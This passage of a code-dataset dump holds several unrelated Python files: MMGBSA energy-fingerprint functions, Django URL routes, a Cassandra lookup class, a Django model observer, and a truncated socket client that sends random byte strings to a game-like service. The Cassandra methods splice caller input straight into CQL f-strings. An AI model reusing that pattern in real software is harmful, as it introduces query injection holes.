stdev' are returned.\r\n if False then 'Internal mean', 'Internal stdev' are included, too.\r\n scale: if True then the actual values and the stdev will be scaled separately.\r\n skewness: if True, then include the 3rd distribution moment (skewness) along with the average value of each term and its stdev.\r\n\r\n \"\"\"\r\n \r\n residue_set = set()\r\n # print(\"DEBUG: self.compound_residue_LIG_decompositionArray_mdict=\", self.compound_residue_LIG_decompositionArray_mdict)\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n residue_list = list(residue_set) # all the residues that have interactions in all pocket files\r\n # print(\"DEBUG: residue_list=\", residue_list)\r\n \r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if only_terms == True and self.include_skewness == False:\r\n MMGBSA_fp = np.zeros(4*2)\r\n elif only_terms == False and self.include_skewness == False:\r\n MMGBSA_fp = np.zeros(5*2)\r\n elif only_terms == True and self.include_skewness == True:\r\n MMGBSA_fp = np.zeros(4*3)\r\n elif only_terms == False and self.include_skewness == True:\r\n MMGBSA_fp = np.zeros(5*3)\r\n else:\r\n if only_terms == True and self.include_skewness == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][1:5,0:2].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == False and self.include_skewness == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:5,0:2].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == True and self.include_skewness == True:\r\n # include the 4th column in each line, which is the skewness\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][1:5,[0,1,3]].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == False and self.include_skewness == True:\r\n # include the 4th column in each line, which is the skewness\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:5,[0,1,3]].ravel() # the full MMGBSA fingeprint(for this compound\r\n \r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if only_terms == True and self.include_skewness == False:\r\n a6 = np.zeros(4*2)\r\n elif only_terms == False and self.include_skewness == False:\r\n a6 = np.zeros(5*2)\r\n elif only_terms == True and self.include_skewness == True:\r\n a6 = np.zeros(4*3)\r\n elif only_terms == False and self.include_skewness == True:\r\n a6 = np.zeros(5*3)\r\n else:\r\n if only_terms == True and self.include_skewness == False:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][1:5,0:2] # ommit the 1st and 6th rows which are the Internal and Total DeltaG\r\n elif only_terms == False and self.include_skewness == False:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:5,0:2] # ommit the 6th row which is the Total DeltaG\r\n elif only_terms == True and 
self.include_skewness == True:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][1:5,[0,1,3]] # ommit the 1st and 6th rows which are the Internal and Total DeltaG\r\n elif only_terms == False and self.include_skewness == True:\r\n # print(\"DEBUG: residue=\", residue, \"self.compound_residue_LIG_decompositionArray_mdict[compound][residue]=\", self.compound_residue_LIG_decompositionArray_mdict[compound][residue].tolist())\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:5,[0,1,3]] # ommit the 6th row which is the Total DeltaG\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if binnedDeltaG and not self.include_skewness:\r\n MMGBSA_fp_list = self.get_binnedDeltaG(MMGBSA_fp_list) # MMGBSA_fp_list now contrains only binned DeltaG, no stdev\r\n \r\n residue_list = [r.split()[0]+r.split()[1] for r in residue_list] # make the format compatible with SiFt\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n # ## scale separately the means and the stdevs\r\n # Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n # Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n # Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n # Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n # MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n # MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n # shift1 = (0.0 - Xmin1) / float(Xmax1 - Xmin1)\r\n # shift2 = (0.0 - Xmin2) / float(Xmax2 - Xmin2)\r\n # MMGBSA_fp_array = MMGBSA_fp_array[:, 0::2] - shift1\r\n # MMGBSA_fp_array = MMGBSA_fp_array[:, 1::2] - shift2\r\n \r\n ## alternativelly scale them all together (here I assume that there is at least one negative value)\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n MMGBSA_fp_array = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n shift = (0.0 - Xmin) / float(Xmax - Xmin)\r\n MMGBSA_fp_array = MMGBSA_fp_array - shift\r\n multiplier = -1.0/np.min(MMGBSA_fp_array) # assuming that there is at least one negative value!\r\n MMGBSA_fp_array = multiplier * MMGBSA_fp_array\r\n \r\n if self.include_skewness:\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::2])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::2])\r\n MMGBSA_fp_array[:, 2::2] = (MMGBSA_fp_array[:, 2::2] - Xmin3) / float(Xmax3 - Xmin3)\r\n if get_reslist:\r\n return list(MMGBSA_fp_array), residue_list\r\n else:\r\n return list(MMGBSA_fp_array)\r\n \r\n if get_reslist:\r\n return MMGBSA_fp_list, residue_list\r\n else:\r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_full_MMGBSA_fp_list(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the full MMGBSA fingerprints of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n compounds2remove_set = set()\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n compounds2remove_set.add(compound)\r\n MMGBSA_fp = np.zeros(18)\r\n else:\r\n MMGBSA_fp = 
self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n compounds2remove_set.add(compound)\r\n a6x3 = np.zeros(18)\r\n else:\r\n a6x3 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6x3.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n print(\"DDEBUG: compounds2remove_set=\", compounds2remove_set)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::3])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::3])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::3])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::3])\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::3])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::3])\r\n MMGBSA_fp_array[:, 0::3] = (MMGBSA_fp_array[:, 0::3] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::3] = (MMGBSA_fp_array[:, 1::3] - Xmin2) / float(Xmax2 - Xmin2)\r\n MMGBSA_fp_array[:, 2::3] = (MMGBSA_fp_array[:, 2::3] - Xmin3) / float(Xmax3 - Xmin3)\r\n return list(MMGBSA_fp_array), compounds2remove_set\r\n \r\n return MMGBSA_fp_list, compounds2remove_set\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_MMGBSA_fp_list(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints (E only) of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n MMGBSA_fp = np.zeros(6)\r\n else:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:,0].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n a6 = np.zeros(6)\r\n else:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:,0]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n X_scaled = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n return list(X_scaled)\r\n \r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def fillin_missing_residues(self):\r\n \"\"\"\r\n Function to make all compounds to have the same set of residues in self.compound_residue_LIG_decompositionArray_mdict. 
For those that did\r\n not exist an 6x3 array of zeros will be added.\r\n \r\n \"\"\"\r\n residue_set = set()\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n \r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in residue_set:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue] = np.zeros((6,3))\r\n \r\n \r\n def get_binnedDeltaG(self, MMGBSA_fp_list):\r\n \"\"\"\r\n It is assumed here that MMGBSA_fp_list contains DeltaG+stdev or DeltaG+stderr. Then the DeltaG is placed into bins with size that of the\r\n largest stdev or stderr. In this case the noise in the measurements is reduced.\r\n \r\n RETURNS:\r\n binned_mmgbsa_fp_list: a list of arrays with the binned DeltaG contribution of each residue (without the stdev).\r\n \"\"\"\r\n \r\n max_stdev = 0.0\r\n for mmgbsa_fp in MMGBSA_fp_list:\r\n for stdev in mmgbsa_fp[1::2]: # it works also for stderr\r\n if stdev > max_stdev:\r\n max_stdev = stdev\r\n \r\n binned_mmgbsa_fp_list = []\r\n for mmgbsa_fp in MMGBSA_fp_list:\r\n binned_mmgbsa_fp = np.round(mmgbsa_fp[0::2]/max_stdev)\r\n binned_mmgbsa_fp_list.append(binned_mmgbsa_fp)\r\n \r\n return binned_mmgbsa_fp_list\r\n \r\n \r\n def get_DeltaG_fp_list(self, compound_list, scale=True, stdev=True, stderr=False, get_reslist=False, binnedDeltaG=False):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints of all the compounds in compound_list. The fingerprints will contain\r\n the DeltaG contribution of each residue to the total DeltaG, and optionally the stdev and/or the stderr. The function takes care to include\r\n for each compound all the residues that have occured in the energy decomposition files. Those that are absent from a compound, are fill in\r\n with zeros. 
Consequently, at the end the mmgbsa_fg of each compound will have the same length\r\n \r\n ARGS:\r\n scale: if True then the actual values and the stdev will be scaled separately.\r\n\r\n \"\"\"\r\n \r\n # self.fillin_missing_residues() # function to add for every compound, arrays of zeros in place of residues that were too far to be analyzed \r\n if binnedDeltaG: # we need the stdev to bin the energy!\r\n stdev=True\r\n stderr=False\r\n \r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_set = set()\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n residue_list = list(residue_set) # all the residues that have interactions in all pocket files\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n MMGBSA_fp = np.zeros(2)\r\n elif stdev == True and stderr == True:\r\n MMGBSA_fp = np.zeros(3)\r\n elif stdev == False and stderr == False:\r\n MMGBSA_fp = np.zeros(1)\r\n else:\r\n if stdev == True and stderr == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0:2].ravel()\r\n elif stdev == False and stderr == True:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0::2].ravel()\r\n elif stdev == True and stderr == True:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,:].ravel()\r\n elif stdev == False and stderr == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][5,0].ravel()\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n a1 = np.zeros(2)\r\n elif stdev == True and stderr == True:\r\n a1 = np.zeros(3)\r\n elif stdev == False and stderr == False:\r\n a1 = np.zeros(1)\r\n else:\r\n if stdev == True and stderr == False:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0:2].ravel() # 1st & 2nd element\r\n elif stdev == False and stderr == True:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0::2].ravel() # 1st & 3rd element\r\n elif stdev == True and stderr == True:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,:].ravel() # all 3 elements\r\n elif stdev == False and stderr == False:\r\n a1 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][5,0].ravel() # 1st element\r\n MMGBSA_fp = np.append(MMGBSA_fp , a1.ravel())\r\n # MMGBSA_fp[0::2] = -1.0*MMGBSA_fp[0::2] # change the singe of the DeltaG (NOTHING CHANGES IN THE PRERFORMANCE!)\r\n # print(\"DEBUG: append MMGBSA_fp=\", MMGBSA_fp.tolist())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if binnedDeltaG:\r\n MMGBSA_fp_list = self.get_binnedDeltaG(MMGBSA_fp_list) # MMGBSA_fp_list now contrains only binned DeltaG, no stdev\r\n \r\n residue_list = [r.split()[0]+r.split()[1] for r in residue_list] 
# make the format compatible with SiFt\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n if (stdev == True and stderr == False) or (stdev == False and stderr == True):\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n elif stdev == True and stderr == True:\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::3])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::3])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::3])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::3])\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::3])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::3])\r\n MMGBSA_fp_array[:, 0::3] = (MMGBSA_fp_array[:, 0::3] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::3] = (MMGBSA_fp_array[:, 1::3] - Xmin2) / float(Xmax2 - Xmin2)\r\n MMGBSA_fp_array[:, 2::3] = (MMGBSA_fp_array[:, 2::3] - Xmin3) / float(Xmax3 - Xmin3)\r\n elif stdev == False and stderr == False:\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n MMGBSA_fp_array = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n if get_reslist:\r\n return list(MMGBSA_fp_array), residue_list\r\n else:\r\n return list(MMGBSA_fp_array)\r\n \r\n if get_reslist:\r\n return MMGBSA_fp_list, residue_list\r\n else:\r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_MMGBSA_fp_list3(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints (E contribution and stderr) of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n MMGBSA_fp = np.zeros(12)\r\n else:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:,0::2].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n a6x2 = np.zeros(12)\r\n else:\r\n a6x2 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:,0::2]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6x2.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n return list(MMGBSA_fp_array)\r\n \r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n def remove_compounds(self, compound_list, compounds2remove_set, dataset, y):\r\n 
\"\"\"\r\n FUNCTION to remove data of compounds that could not be Energy-decomposed completely.\r\n \"\"\"\r\n new_compound_list = []\r\n new_dataset = []\r\n new_y = []\r\n for c,xi,yi in zip(compound_list, dataset, y):\r\n if not c in compounds2remove_set:\r\n new_compound_list.append(c)\r\n new_dataset.append(xi)\r\n new_y.append(yi)\r\n \r\n return new_compound_list, new_dataset, new_y\r\n ","repo_name":"tevang/sqm-ml","sub_path":"library/MMGBSA_functions.py","file_name":"MMGBSA_functions.py","file_ext":"py","file_size_in_byte":51890,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12743326824","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom pages import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\tpath('', views.home, name='home'),\n path('dataset_presentation/', views.dataset_presentation, name='dataset_presentation'),\n path('dataset_presentation/introduction', views.introduction, name='introduction'),\n path('dataset_presentation/features', views.features, name='features'),\n path('dataset_presentation/label', views.label, name='label'),\n path('analysis/', views.analysis, name='analysis'),\n path('analysis/head', views.head, name='head'),\n path('analysis/describe', views.describe, name='describe'),\n path('analysis/data_s', views.data_s, name='data_s'),\n path('analysis/visualization', views.visualization, name='visualization'),\n path('analysis/visualization/pie_plots', views.pie_plots, name='pie_plots'),\n path('analysis/visualization/box_plots', views.box_plots, name='box_plots'),\n path('analysis/visualization/skewness', views.skewness, name='skewness'),\n path('analysis/visualization/scatter_plots', views.scatter_plots, name='scatter_plots'),\n path('analysis/visualization/heatmap', views.heatmap, name='heatmap'),\n path('ml', views.ml, name='ml'),\n path('ml/preprocessing', views.preprocessing, name='preprocessing'),\n path('ml/preprocessing/x_and_y', views.x_and_y, name='x_and_y'),\n path('ml/preprocessing/encoding_y', views.encoding_y, name='encoding_y'),\n path('ml/preprocessing/encoding_x', views.encoding_x, name='encoding_x'),\n path('ml/preprocessing/normalizing_x', views.normalizing_x, name='normalizing_x'),\n path('ml/preprocessing/spliting', views.spliting, name='spliting'),\n path('ml/machine_learning', views.machine_learning, name='machine_learning'),\n path('ml/machine_learning/linear_svc', views.linear_svc, name='linear_svc'),\n path('ml/machine_learning/kneighborsclassifier', views.kneighborsclassifier, name='kneighborsclassifier'),\n path('ml/machine_learning/svc', views.svc, name='svc')\n \n]\n","repo_name":"ArnaudMagarian/Python-for-data-analysis-ML","sub_path":"mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15866392618","text":"import itertools\nfrom cassandra.cluster import Cluster\nfrom cassandra.query import dict_factory\n\nclass DB():\n\n @classmethod\n def open_con(cls):\n cls.cluster = Cluster(['cassandra-c01', 'cassandra-c02'], port=9042)\n # cls.cluster = Cluster(['localhost'], port=9042)\n\n cls.session = cls.cluster.connect('resto')\n\n cls.session.row_factory = dict_factory\n\n @classmethod\n def close_con(cls):\n cls.cluster.shutdown()\n\n\n\n @classmethod\n def get_info_by_id(cls, id_resto):\n cls.open_con()\n data = cls.session.execute(f\"SELECT * FROM restaurant WHERE 
id={id_resto}\").one() \n cls.close_con()\n\n return {'info' : data}\n\n\n @classmethod\n def get_name_by_type(cls, type_cuisine):\n cls.open_con()\n data = cls.session.execute(f\"SELECT * FROM restaurant WHERE cuisinetype='{type_cuisine}'\").all()\n cls.close_con()\n\n return {'data': [resto['name'] for resto in data]}\n\n\n @classmethod\n def get_nb_inspec_by_id(cls, id_resto):\n cls.open_con()\n data = cls.session.execute(f\"select * from restaurant where id = {id_resto}\").one()\n number = len(cls.session.execute(f\"select * from inspection where idrestaurant = {id_resto}\").all())\n\n cls.close_con()\n return {'name': data['name'], 'nb_inspection': number }\n\n\n# les noms des 10 premiers restaurants d'un grade donné.\n @classmethod\n def get_top_10(cls, grade):\n cls.open_con()\n\n data = cls.session.execute(f\"select * from inspection where grade = '{grade}'\").all()\n _ids = tuple(resto['idrestaurant'] for resto in data)[:100]\n top_10 = cls.session.execute(f\"SELECT name FROM restaurant WHERE id IN {_ids}\").all()\n cls.close_con()\n\n return {'grade': grade, 'restaurant': [resto['name'] for resto in top_10][:10]}\n\n","repo_name":"wimblow01/Cassandra_docker_restaurant","sub_path":"app/connexion.py","file_name":"connexion.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38009458570","text":"from abc import abstractmethod\nfrom django.db.models import signals\nfrom django.utils.translation import gettext as _\n\n\nclass ModelObserver:\n \"\"\"\n This class will observe model behavior and triggers different signals.\n \"\"\"\n\n # Signal types\n _available_signal_types = ('pre_init', 'post_init', 'pre_save', 'post_save',\n 'pre_delete', 'post_delete', 'm2m_changed',\n 'pre_migrate', 'post_migrate')\n\n # Model default signals of type: method_name as key and signal_type as value\n DEFAULT_SIGNALS: dict = {\n 'pre_save': '_pre_saving',\n 'post_save': '_post_saving',\n 'post_delete': 'on_delete',\n }\n\n # Model custom signals of type: method_name as key and signal_type as value\n SIGNALS: dict = {}\n\n # Suffix for changed fields. 
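# --- Added usage sketch (hypothetical model and field names, not from the source) ---
# With the SUFFIX = '_changed' convention described here, a concrete observer
# only needs per-field hooks named '<field>_changed' plus the abstract callbacks:
class ArticleObserver(ModelObserver):
    def title_changed(self, **kwargs):
        print('title changed on', kwargs['instance'].pk)

    def on_create(self, **kwargs):
        print('created', kwargs['instance'].pk)

    def on_update(self, **kwargs):
        print('updated', kwargs['instance'].pk)

    def on_delete(self, **kwargs):
        print('deleted', kwargs['instance'].pk)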
Will be used for method call in _pre_saving\n # method.\n SUFFIX = '_changed'\n\n def __init__(self):\n self._signals()\n\n def _pre_saving(self, **kwargs):\n # Arguments\n instance = kwargs.get('instance')\n\n if not instance.pk:\n # In case when object is creating.\n return True\n\n # Getting object before changes\n model = instance.__class__\n\n try:\n previous = model.objects.get(pk=instance.pk)\n instance._pre_save_instance = previous\n instance._pre_delete_instance = previous\n except model.DoesNotExist:\n previous = instance\n instance._pre_save_instance = previous\n instance._pre_delete_instance = previous\n\n # Getting all model fields\n fields = instance._meta.concrete_fields\n\n for field in fields:\n name = field.name\n current_value = getattr(instance, name)\n previous_value = getattr(previous, name)\n method = getattr(self, f'{name}{self.SUFFIX}', None)\n\n if current_value != previous_value and method:\n method(**kwargs)\n\n def _post_saving(self, **kwargs):\n if kwargs.get('created', False):\n return self.on_create(**kwargs)\n\n return self.on_update(**kwargs)\n\n @abstractmethod\n def on_create(self, **kwargs):\n ...\n\n @abstractmethod\n def on_update(self, **kwargs):\n ...\n\n @abstractmethod\n def on_delete(self, **kwargs):\n ...\n\n def _get_all_signals(self):\n all_signals = self.DEFAULT_SIGNALS.copy()\n all_signals.update(self.SIGNALS)\n\n def _signals(self):\n all_signals = self.DEFAULT_SIGNALS.copy()\n all_signals.update(self.SIGNALS)\n\n for signal_type, method_name in all_signals.items():\n # Verifying that method was indicated in SIGNALS model param.\n receiver = getattr(self, method_name, None)\n if not receiver:\n raise AttributeError(_('\\'%(name)s\\' model has no method \\'%(method)s\\'' %\n ({'name': self.__class__.__name__, 'method': method_name})))\n\n # Initialize signal by calling a method.\n self._signal(signal_type, receiver)\n\n def _signal(self, signal_type, receiver):\n # Verifying for existence of signal type.\n signal = getattr(signals, signal_type, None)\n if not signal:\n raise AttributeError(_('Signals don\\'t have signal of type \\'%(first)s\\'. 
'\n 'Available signal types: %(second)s' %\n ({'first': signal_type, 'second': self._available_signal_types})))\n\n # Setting up dispatch_uid\n dispatch_uid = f'{self.__class__.__name__}_{signal_type}'\n\n # Initializing signal\n signal.connect(receiver=receiver, dispatch_uid=dispatch_uid,\n weak=False, sender=self.__class__)\n","repo_name":"ebs-integrator/model-observer","sub_path":"src/model_observer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6073875415","text":"import sys, os\nimport socket\nimport select\nimport random\n\ndef eprint(*args, **kwargs):\n\tprint(*args, file=sys.stderr, **kwargs)\n\ndef GetData(s):\n\tdata = b\"\"\n\n\twhile(1):\n\t\tif len(data):\n\t\t\ttimeout = 0.5\n\t\telse:\n\t\t\ttimeout = 1.5\n\n\t\t(r,w,e) = select.select([s], [], [], timeout)\n\t\tif len(r) == 0:\n\t\t\treturn data\n\n\t\tnew_data = s.recv(1024)\n\t\tif len(new_data) == 0:\n\t\t\treturn data\n\n\t\tdata += new_data\n\treturn data\n\ndef GenRandomString(str_len):\n\tif str_len == -1:\n\t\tstr_len = random.randint(3, 100)\n\n\tstr = []\n\twhile(len(str) < str_len):\n\t\tstr.append(random.randint(1, 255))\n\t\tif str[-1] == 10:\n\t\t\tstr[-1] += 1\n\n\t#pick a random place to be a jerk and do 0408/0508/0608 knowing they might try to ban that combo but only randomly\n\tif random.choice([0,1,2]) == 0:\n\t\trandoffset = random.randint(0, len(str) - 4) & ~3\n\t\tstr[randoffset+2] = 4 + random.randint(0, 2)\n\t\tstr[randoffset+3] = 8\n\n\treturn bytes(str)\n\ndef GetDirections(s):\n\ts.send(b\"describe\\n\")\n\tdata = GetData(s)\n\n\t#parse up the directions\n\tDirections = {}\n\tdata = data.split(b\"\\n\")\n\tif b\"You are in\" not in data[0]:\n\t\treturn {}\n\n\tdata.pop(0)\n\tfor entry in data:\n\t\tcurline = entry.split()\n\t\tif len(curline) < 3:\n\t\t\tbreak\n\t\tcurdir = curline[2]\n\n\t\tdoortype = \"room\"\n\t\tif b\"empty slots\" in entry:\n\t\t\tdoortype = \"wheellock\"\n\t\telif b\"closed door\" in entry:\n\t\t\ts.send(b\"open \" + curdir + 